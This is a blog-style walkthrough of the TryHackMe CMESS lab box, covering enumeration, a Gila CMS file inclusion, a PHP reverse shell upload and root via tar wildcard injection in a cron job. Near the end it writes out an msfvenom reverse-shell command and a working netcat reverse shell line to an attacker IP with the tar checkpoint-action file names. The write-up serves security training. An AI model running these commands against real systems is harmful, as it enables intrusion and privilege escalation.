This is going to be a simple walkthrough on how I did CMESS box on TryHackMe.com. The privilege escalation demonstartes a really good use of wildcard exploitation. The creator of the box is Optional and thank you to him for creating an awesome fun box.
Let’s g3t 4 Sh3ll
First things first we’re told to add the hostname to our /etc/hosts file.
So kicking off the box with an nmap scan we see only ports 80 and 22 open.
Heading over to port 80 we see a simple and pretty empty home page.
Running gobuster on the site gives us quite a few entries back.
As well as directories we should always enumerate for any subdomains, for that i used a tool called wfuzz.
Here we see that we got a subdomain back, so add this entry in to the hosts file also, so we can browse to it.
Upon going to our new found subdomain we see a conversation between the user, andre and support. These are both email address or possible usernames we could use in the future so make note of these.
We also see that support user has reset andre’s password so lets take that and see if we can use it anywhere. looking back at our gobuster output we can see we have a /admin directory. Lets take a look.
We find a login page that takes an email and a password, these we have so lets try it.
And we get logged in. Straight away we see a “Gila CMS version” so lets take a look if there’s any exploits for it.
Searchsploit shows that there is a LFI or Local File Inclusion for this version so lets take a look using
searchsploit -x <exploit-path>
Lets see if we can use the last bit of this url in the CMS we have access to and see if it returns anything.
Append this to the end of our URL.
Okay great! we see we have some type of directory listing now with some upload functionaly so lets see if we can upload a shell.
We manage to upload a payload which goes in to the “assets” directory. Lets start listener and then browse to http://cmess.thm/assets/php-reverse-shell.php to get the server to process the payload.
Awesome we have a shell as www-data. Looking around we see we cant get in to the andre directory, so our next step is lateral movement to andre.
Lat3ral m0ve to Andre u5er…
Lets head over to the /tmp directory and grab linenum.sh and see what we can do as www-data user and maybe see if we can find anything interesting.
Kicking this off with “./le.sh -t”. The “-t” is for thorough testing, we then see in the results some interesting files lurking about.
This looks interesting so lets take a look.
Awesome we found a password!! lets see if we can now SSH to the box as andre 😀
Awesome lets grab user.txt while we’re here 🙂
L3ts g3t R00T!
Nice we got user!! lets repeat the linenum process and see if we can do anything else new. However this time im going to use an “upgraded” version of LinEnum called LinPeas. This does the same thing as linenum and some more…
Linpeas has a wicked awesome colour scheme for quickly hunting out privelege escalation points! so lets begin the hunt.
Looking in to our results from linpeas we see that its flagged a cronjob that runs as root every 2 mins.
This job is running a tar command to backup the andre users “backup” directory and everything in it.
because this tar job is running with the “*” wildcard parameter we can do a wildcard exploit. googling around we find this https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ – these guys do a great job explaining the exploit, better than me at least.
we need to create 2 directories and a shell.sh file inside /home/andre/backup directory that tar will see and interpret it as commands and execute. SUCKAA!
msfvenom -p cmd/unix/reverse_netcat lhost=ATTACKER-IPADDRESS lport=ATTACKER-PORT R
Head over to the directory thats going to be backed up by tar, we see a little note.
lets now echo our payload in to “shell.sh” and create the 2 directories needed for this exploit.
echo "mkfifo /tmp/obizbxg; nc 10.8.5.236 9009 0</tmp/obizbxg | /bin/bash >/tmp/obizbxg 2>&1; rm /tmp/obizbxg" > shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" && echo "" > --checkpoint=1
Now we wait for the cron job to run and we should get tar interpret them commands and execute our shell.sh file.
Woop Woop we got our shell back from the box!
This was a great box and really demonstrated the issues behind using wildcard’s in automated jobs or scripts, and how a hacker can leverage these vulnerabilies to gain higher privileges.